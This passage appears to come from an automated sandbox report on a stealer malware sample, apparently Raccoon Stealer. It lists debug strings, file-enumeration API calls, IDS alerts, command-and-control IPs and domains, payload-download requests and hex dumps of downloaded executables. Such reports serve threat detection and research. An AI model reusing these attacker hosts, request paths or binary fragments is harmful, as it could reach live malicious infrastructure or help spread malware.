                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdbk source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000010.00000003.783122739.0000000004EC6000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000010.00000003.783122739.0000000004EC6000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 00000010.00000003.783122739.0000000004EC6000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: BB8A.exe, 0000000C.00000000.759454697.0000000000413000.00000002.00020000.sdmp, BB8A.exe, 0000000C.00000000.765793505.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000010.00000002.807243826.0000000004DE0000.00000002.00020000.sdmp
                      Source: Binary string: C:\bajudag\zexi\yedu49\hecicu\2-tiwi\cabilok\fes.pdb source: D936.exe, 00000011.00000000.776580962.0000000000401000.00000020.00020000.sdmp, krmdinzg.exe, 00000020.00000000.795753078.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: C:\nobaniz_sakalacato34.pdb source: ECD2MpEBSf.exe, ECD2MpEBSf.exe, 00000000.00000002.667356464.0000000000401000.00000020.00020000.sdmp, ECD2MpEBSf.exe, 00000000.00000000.661810290.0000000000401000.00000020.00020000.sdmp, ECD2MpEBSf.exe, 00000001.00000000.664620927.0000000000401000.00000020.00020000.sdmp, jgdhbua, 00000009.00000000.751866281.0000000000401000.00000020.00020000.sdmp, jgdhbua, 00000009.00000002.758107473.0000000000401000.00000020.00020000.sdmp, jgdhbua, 0000000B.00000000.755033215.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000010.00000003.778942214.0000000000B3E000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.777377914.0000000000B3E000.00000004.00000001.sdmp
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 0_2_004198CC GetPrivateProfileSectionW,BuildCommDCBAndTimeoutsW,CreateMailslotA,CallNamedPipeA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,GetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameW,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeA,FindFirstFileExW,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00688A30 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_006812E0 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_006814D0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00686090 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00689930 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00689BC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00689D90 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.4:49891 -> 74.201.28.62:80
                      Source: TrafficSnort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.4:49912 -> 185.163.204.24:80
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.142.143.116 443
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: patmushta.info
                      Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                      Source: C:\Windows\explorer.exeNetwork Connect: 188.166.28.199 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.47.53.36 25
                      Source: C:\Windows\explorer.exeDomain query: unicupload.top
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144
                      Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: microsoft-com.mail.protection.outlook.com
                      Source: C:\Windows\explorer.exeDomain query: goo.su
                      Source: C:\Windows\explorer.exeDomain query: transfer.sh
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
                      Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
                      May check the online IP address of the machineShow sources
                      Source: C:\Users\user\AppData\Local\Temp\CADF.exeDNS query: name: iplogger.org
                      Source: unknownDNS query: name: iplogger.org
                      Source: global trafficHTTP traffic detected: GET /book/KB5009812.png HTTP/1.1Host: 74.201.28.62Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /capibar HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: 185.163.204.22
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 185.163.204.24
                      Source: global trafficHTTP traffic detected: GET //l/f/RGwRWn4BZ2GIX1a3oIgO/6bf5d5b41363c3e6b44705458de7ee6f935456db HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
                      Source: global trafficHTTP traffic detected: GET //l/f/RGwRWn4BZ2GIX1a3oIgO/7e7a36a98c7545dda4f314e30bbcbe9a8ba64652 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:13 GMTContent-Type: application/x-msdos-programContent-Length: 301056Connection: closeLast-Modified: Mon, 10 Jan 2022 12:06:49 GMTETag: "49800-5d5392be00934"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 32 74 07 b2 76 15 69 e1 76 15 69 e1 76 15 69 e1 68 47 fc e1 69 15 69 e1 68 47 ea e1 fc 15 69 e1 68 47 ed e1 5b 15 69 e1 51 d3 12 e1 71 15 69 e1 76 15 68 e1 f9 15 69 e1 68 47 e3 e1 77 15 69 e1 68 47 fd e1 77 15 69 e1 68 47 f8 e1 77 15 69 e1 52 69 63 68 76 15 69 e1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d4 e8 62 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 1e 01 00 00 f6 03 00 00 00 00 00 9f 2d 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 05 00 00 04 00 00 a7 ea 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 65 01 00 50 00 00 00 00 00 04 00 b0 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 32 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c5 1d 01 00 00 10 00 00 00 1e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 44 3f 00 00 00 30 01 00 00 40 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 84 02 00 00 70 01 00 00 24 02 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 10 01 00 00 00 04 00 00 12 01 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:17 GMTContent-Type: application/x-msdos-programContent-Length: 324608Connection: closeLast-Modified: Fri, 14 Jan 2022 19:29:01 GMTETag: "4f400-5d58fd0ac7fe8"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6d 1f 39 8a 29 7e 57 d9 29 7e 57 d9 29 7e 57 d9 37 2c c2 d9 33 7e 57 d9 37 2c d4 d9 af 7e 57 d9 0e b8 2c d9 2e 7e 57 d9 29 7e 56 d9 c9 7e 57 d9 37 2c d3 d9 13 7e 57 d9 37 2c c3 d9 28 7e 57 d9 37 2c c6 d9 28 7e 57 d9 52 69 63 68 29 7e 57 d9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 6f ac 7d 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 f6 03 00 00 ac 11 00 00 00 00 00 50 c3 01 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 15 00 00 04 00 00 5b e9 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 f0 03 00 50 00 00 00 00 10 15 00 28 87 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 15 00 f8 1d 00 00 a0 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 91 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 4c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 2e f4 03 00 00 10 00 00 00 f6 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 88 c9 10 00 00 10 04 00 00 18 00 00 00 fa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 7a 69 63 00 00 00 00 05 00 00 00 00 e0 14 00 00 02 00 00 00 12 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 77 75 76 75 68 75 73 ea 00 00 00 00 f0 14 00 00 02 00 00 00 14 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6a 75 66 6f 74 00 00 93 0d 00 00 00 00 15 00 00 0e 00 00 00 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 87 00 00 00 10 15 00 00 88 00 00 00 24 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 64 46 00 00 00 a0 15 00 00 48 00 00 00 ac 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:49 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b cf 9c fb cf ae f2 a8 cf ae f2 a8 cf ae f2 a8 d1 fc 67 a8 d3 ae f2 a8 d1 fc 71 a8 49 ae f2 a8 d1 fc 76 a8 e1 ae f2 a8 e8 68 89 a8 cc ae f2 a8 cf ae f3 a8 45 ae f2 a8 d1 fc 78 a8 ce ae f2 a8 d1 fc 66 a8 ce ae f2 a8 d1 fc 63 a8 ce ae f2 a8 52 69 63 68 cf ae f2 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 cf 5b b6 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 32 0d 00 00 00 00 00 00 30 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 e4 71 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 66 01 00 28 00 00 00 00 70 0d 00 20 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 1e 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 3f 00 00 00 30 01 00 00 40 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 fe 0b 00 00 70 01 00 00 9e 0b 00 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 dd 6e 02 00 70 0d 00 00 ce 00 00 00 02 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 19:29:55 GMTServer: Apache/2.4.38 (Win32) PHP/7.1.26Last-Modified: Fri, 14 Jan 2022 17:15:09 GMTETag: "6ff1c7-5d58df1eec44d"Accept-Ranges: bytesContent-Length: 7336391Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 58 b0 38 63 39 de 6b 63 39 de 6b 63 39 de 6b 77 52 da 6a 68 39 de 6b 77 52 dd 6a 64 39 de 6b 77 52 db 6a df 39 de 6b 05 56 23 6b 67 39 de 6b 31 4c db 6a 45 39 de 6b 31 4c da 6a 72 39 de 6b 31 4c dd 6a 6a 39 de 6b 77 52 df 6a 68 39 de 6b 63 39 df 6b e4 39 de 6b d9 4c da 6a 70 39 de 6b d9 4c dc 6a 62 39 de 6b 52 69 63 68 63 39 de 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 51 ae e1 61 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 1d 00 36 02 00 00 54 01 00 00 00 00 00 c8 a8 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 d0 04 00 00 04 00 00 12 0b 70 00 02 00 60 81 80 84 1e 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 5b 03 00 78 00 00 00 00 b0 04 00 e3 05 00 00 00 80 04 00 e8 1d 00 00 00 00 00 00 00 00 00 00 00 c0 04 00 48 07 00 00 20 39 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 39 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 50 02 00 e8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 35 02 00 00 10 00 00 00 36 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 98 18 01 00 00 50 02 00 00 1a 01 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 03 01 00 00 70 03 00 00 0c 00 00 00 54 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 e8 1d 00 00 00 80 04 00 00 1e 00 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 f4 00 00 00 00 a0 04 00 00 02 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e3 05 00 00 00 b0 04 00 00 06 00 00 00 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 48 07 00 00 00 c0 04 00 00 08 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Fri, 14 Jan 2022 18:57:27 GMTAccept-Ranges: bytesETag: "9bd1193789d81:0"Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Fri, 14 Jan 2022 19:30:02 GMTContent-Length: 54272Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9c 76 4c 96 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 16 00 00 00 bc 00 00 00 00 00 00 12 35 00 00 00 20 00 00 00 40 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 34 00 00 4f 00 00 00 00 40 00 00 5c b9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 a4 34 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 18 15 00 00 00 20 00 00 00 16 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 5c b9 00 00 00 40 00 00 00 ba 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 01 00 00 02 00 00 00 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 34 00 00 00 00 00 00 48 00 00 00 02 00 05 00 8c 23 00 00 60 10 00 00 01 00 00 00 01 00 00 06 ec 33 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 01 00 3a 00 00 00 01 00 00 11 00 28 13 00 